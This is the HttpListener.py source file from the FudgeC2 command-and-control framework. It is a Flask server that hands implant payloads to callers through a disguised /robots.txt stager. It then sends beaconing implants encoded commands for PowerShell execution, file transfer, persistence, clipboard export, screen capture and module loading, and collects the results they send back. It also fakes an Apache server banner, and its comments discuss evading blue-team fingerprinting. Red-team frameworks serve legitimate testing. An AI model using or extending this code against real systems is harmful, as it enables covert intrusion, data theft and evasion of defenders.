Codebase list fudgec2 / upstream/latest FudgeC2 / Listeners / HttpListener.py
upstream/latest

Tree @upstream/latest (Download .tar.gz)

HttpListener.py @upstream/latest · raw · history · blame

from flask import Flask, request
import base64
from uuid import uuid4
import os

from Implant.Implant import ImplantSingleton
from Data.Database import Database

# Shared handles used by the route handlers below: the implant singleton
# (command issuing / payload generation) and the database wrapper.
Imp = ImplantSingleton.instance
db = Database()

# The Flask application name and its SECRET_KEY are both fresh random UUID4
# strings, generated each time this module is imported.
app = Flask(str(uuid4()))
app.config['SECRET_KEY'] = str(uuid4())


# Functions that encode the built-in commands for transfer to the implant.
def craft_sound_file(value_dict, command_id):
    """Build the beacon payload that carries a sound resource.

    The file named by ``value_dict['args']`` is read in binary mode from
    ``<cwd>/Storage/implant_resources/`` and base64 encoded.

    Returns the string ``<type><command_id><base64 file contents>``.
    """
    resource_path = f"{os.getcwd()}/Storage/implant_resources/{value_dict['args']}"
    with open(resource_path, 'rb') as resource:
        raw_audio = resource.read()
    encoded_audio = base64.b64encode(raw_audio).decode()
    return f"{value_dict['type']}{command_id}{encoded_audio}"


def craft_powershell_native_command(args, command_id):
    """Build the beacon payload for a native PowerShell command.

    ``args['args']`` holds the command text; it is UTF-8 encoded and then
    base64 encoded.

    Returns ``<type><command_id><base64 command text>``.
    """
    command_bytes = args['args'].encode()
    encoded_command = base64.b64encode(command_bytes).decode()
    header = args['type'] + command_id
    return header + encoded_command


def craft_file_upload(value_dict, command_id):
    """Build the beacon payload that uploads a local resource to the implant.

    ``value_dict['args']`` has the form ``"<local_file> <target_location>"``.
    The first whitespace-separated token names a file under
    ``<cwd>/Storage/implant_resources/``; everything after it is the
    destination path, which may itself contain spaces.

    Returns ``<type><command_id>`` followed by
    ``base64(base64(target_location) + "::" + base64(file contents))``.

    Raises:
        IndexError: if no target location is supplied.
        OSError: if the local resource cannot be opened or read.
    """
    # Split only once: a destination such as "C:\Program Files\x" must not be
    # truncated at its first space, and doubled spaces between the two
    # arguments must not produce an empty target.
    arg_parts = value_dict['args'].strip().split(None, 1)
    local_file = arg_parts[0]
    target_location = arg_parts[1]

    with open(os.getcwd() + "/Storage/implant_resources/" + local_file, 'rb') as file_h:
        file_b64 = base64.b64encode(file_h.read()).decode()

    target_b64 = base64.b64encode(target_location.encode()).decode()
    # The "target::content" pair is base64 encoded once more so the whole
    # argument travels as a single token after the command header.
    combined = base64.b64encode(f"{target_b64}::{file_b64}".encode()).decode()
    return str(value_dict['type'] + command_id) + combined


def craft_file_download(value_dict, command_id):
    """Build the beacon payload that requests a file from the implant.

    ``value_dict['args']`` is the path of the file to fetch; it is UTF-8
    encoded and then base64 encoded.

    Returns ``<type><command_id><base64 target path>``.
    """
    target_bytes = value_dict['args'].encode()
    encoded_target = base64.b64encode(target_bytes).decode()
    return f"{value_dict['type']}{command_id}{encoded_target}"


def craft_enable_persistence(value_dict, command_id):
    """Build the beacon payload for the enable-persistence command.

    No argument is encoded; the payload is just ``<type><command_id>``.
    """
    header = value_dict['type'] + command_id
    return str(header)


def craft_sys_info(value_dict, command_id):
    """Build the beacon payload for the system-information command.

    No argument is encoded; the payload is just ``<type><command_id>``.
    """
    header = value_dict['type'] + command_id
    return str(header)


def craft_export_clipboard(value_dict, command_id):
    """Build the beacon payload for the export-clipboard command.

    No argument is encoded; the payload is just ``<type><command_id>``.
    """
    header = value_dict['type'] + command_id
    return str(header)


def craft_load_module(value_dict, command_id):
    """Build the beacon payload that ships a PowerShell module to the implant.

    ``value_dict['args']`` is the module name; its source is read from
    ``<cwd>/Storage/implant_resources/modules/<name>.ps1``.

    Returns ``"LM" + command_id + base64("<name>::<module source>")``. The
    prefix is the literal "LM", not ``value_dict['type']``. If anything goes
    wrong (for example the module file does not exist) the failure is printed
    and the idle reply ``"=="`` is returned instead.
    """
    try:
        module_path = str(os.getcwd()+"/Storage/implant_resources/modules/"+value_dict['args']+".ps1")
        with open(module_path, 'r') as module_file:
            module_source = module_file.read()
            to_encode = f"{value_dict['args']}::{module_source}"
            encoded_module = base64.b64encode(to_encode.encode()).decode()
            return "LM" + command_id + encoded_module
    except Exception as e:
        # These exceptions should be added to a log file.
        print(f"Load module failed: {e}")
    return "=="


def craft_invoke_module(value_dict, command_id):
    """Build the beacon payload that invokes a module on the implant.

    ``value_dict['args']`` is UTF-8 encoded and then base64 encoded.

    Returns ``<type><command_id><base64 args>``.
    """
    invocation_bytes = value_dict['args'].encode()
    encoded_invocation = base64.b64encode(invocation_bytes).decode()
    header = value_dict['type'] + command_id
    return header + encoded_invocation


def craft_list_modules(value_dict, command_id):
    """Build the beacon payload for the list-modules command.

    No argument is encoded; the payload is just ``<type><command_id>``.
    """
    header = value_dict['type'] + command_id
    return str(header)

def craft_screen_capture(value_dict, command_id):
    """Build the beacon payload for the screen-capture command.

    No argument is encoded; the payload is just ``<type><command_id>``.
    """
    header = value_dict['type'] + command_id
    return str(header)

# Dispatch table: maps the two-letter type code of a queued command to the
# craft_* function that encodes it for transfer. implant_beacon_endpoint looks
# up next_cmd['type'] here and calls the result with (command dict, command_id).
preprocessing = {
    "PS": craft_sound_file,
    "CM": craft_powershell_native_command,
    "UF": craft_file_upload,
    "FD": craft_file_download,
    "EP": craft_enable_persistence,
    "SI": craft_sys_info,
    "EC": craft_export_clipboard,
    "LM": craft_load_module,
    "IM": craft_invoke_module,
    "ML": craft_list_modules,
    "SC": craft_screen_capture
    }


@app.before_request
def before_request():
    """Pre-request hook; currently a placeholder that does nothing.

    It returns None, so no response is produced here.
    """
    # TODO: Implement an IP whitelist and reject the connection if it does not
    # come from a valid source IP.
    return None


# Replace the Werkzeug Server header to reduce Fudge's server fingerprinting.
@app.after_request
def alter_headers(response):
    """Overwrite the ``Server`` header on every outgoing response.

    Returns the same response object with the header set to an Apache banner.
    """
    spoofed_banner = "Apache/2.4.1 (Unix)"
    response.headers['Server'] = spoofed_banner
    return response


# -- TODO: extract this into a new stager-specific listener(?)
@app.route("/robots.txt", methods=['GET'])
def stager():
    """Generate and serve an implant in response to a stager callback.

    The stager key is read from the ``user`` request value and passed to
    ``db.implant.Register_NewImplantFromStagerKey``. When that yields implant
    data, the payload generated from it is returned.

    Returns:
        The generated payload, or ``("404", 404)`` when the ``user`` value is
        missing or the key does not produce implant data.
    """
    stager_key = request.values.get('user')
    if stager_key is None:
        # Indexing request.values directly would make Flask answer 400 for a
        # missing parameter; answer exactly as for an unknown key instead.
        return "404", 404

    implant_data = db.implant.Register_NewImplantFromStagerKey(stager_key)
    if not implant_data:
        return "404", 404
    return Imp.GeneratePayload(implant_data)


@app.route("/index", methods=["GET", "POST"])
def implant_beacon_endpoint():
    """Answer an implant beacon with its next command, if there is one.

    The implant identifies itself through the ``X-Implant`` header. When a
    command is queued for it, the command is encoded by the matching entry of
    ``preprocessing`` and returned; otherwise the idle reply ``"=="`` is sent.
    """
    if 'X-Implant' in request.headers:
        next_cmd, command_id = Imp.issue_command(request.headers['X-Implant'], app.config['listener_type'])
        if next_cmd is not None:
            encoder = preprocessing[next_cmd['type']]
            return encoder(next_cmd, command_id)
    # Need to remove the use of == in beacons, this can be fingerprinted with ease.
    return "=="


@app.route("/help", methods=['GET', 'POST'])
def implant_command_result():
    """Receive the result of a command posted back by an implant.

    The request body is only interpreted when the ``X-Result`` header is
    present. Its first 24 characters are the command id and the remainder is
    the base64-encoded result, which is decoded and handed to
    ``Imp.command_response``.

    Always returns ``"=="``; a body that is not valid UTF-8 or not valid
    base64 is ignored rather than causing a server error.
    """
    # -- X-Result is a placeholder header and should be changed to a more realistic value
    response_stream_data = request.stream.read()
    if "X-Result" not in request.headers:
        return "=="

    try:
        decoded_response_stream_data = response_stream_data.decode()
        command_id = decoded_response_stream_data[0:24]
        encoded_command = decoded_response_stream_data[24:]
        # "==" is appended before decoding, presumably so that results sent
        # without their base64 padding still decode -- TODO confirm.
        decoded_response = base64.b64decode(f"{encoded_command}==")
    except ValueError:
        # UnicodeDecodeError and binascii.Error are both ValueError
        # subclasses. This endpoint accepts untrusted input, so a malformed
        # body gets the same reply as any other request instead of a 500.
        return "=="

    Imp.command_response(command_id, decoded_response, app.config['listener_type'])
    return "=="


# This should be randomised to avoid blueteams fingerprinting the server by querying this endpoint.
@app.route("/nlaksnfaobcaowb", methods=['GET', 'POST'])
def shutdown_listener():
    """Stop the listener when asked to by a request from 127.0.0.1.

    Returns:
        ``("404", 404)`` for any other source address, otherwise ``"=="``
        after invoking the server's shutdown hook if one is present in the
        WSGI environ.
    """
    if request.remote_addr != "127.0.0.1":
        # A view must always return a response; falling through with None
        # makes Flask raise and answer 500.
        return "404", 404

    # NOTE(review): the 'werkzeug.server.shutdown' environ key is believed to
    # be absent on newer Werkzeug releases, in which case nothing is shut
    # down here -- confirm against the pinned Werkzeug version.
    shutdown_hook = request.environ.get('werkzeug.server.shutdown')
    if shutdown_hook is not None:
        shutdown_hook()
    return "=="


def shutdown():
    """Abort by raising ``RuntimeError("Server going down")``."""
    reason = "Server going down"
    raise RuntimeError(reason)